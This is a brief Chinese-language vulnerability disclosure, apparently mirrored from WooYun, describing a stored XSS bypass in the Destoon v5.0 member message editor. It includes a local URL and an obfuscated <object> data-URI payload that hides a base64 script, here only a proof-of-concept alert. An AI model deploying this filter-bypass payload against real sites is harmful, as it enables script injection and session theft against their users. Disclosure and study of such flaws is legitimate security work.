destoon /v5.0/ 存储型xss 指哪打哪(绕过2)

2014-05-27T00:00:00
ID SSV:94494
Type seebug
Reporter Root
Modified 2014-05-27T00:00:00

Description

简要描述:

就这样 继续绕过去

详细说明:

关联url: WooYun: destoon /v5.0/ 存储型xss 指哪打哪(绕过1) 注册一个用户 http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa 回复处用了编辑器 编辑器有些标签没过滤,导致xss执行 xsscode:

<object data=data:text/html;bas&#x65	
64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>

<img src="https://images.seebug.org/upload/201405/23210227830ac219af84878daaaf7a43c701888e.jpg" alt="2222222.jpg" width="600" onerror="javascript:errimg(this);">

漏洞证明: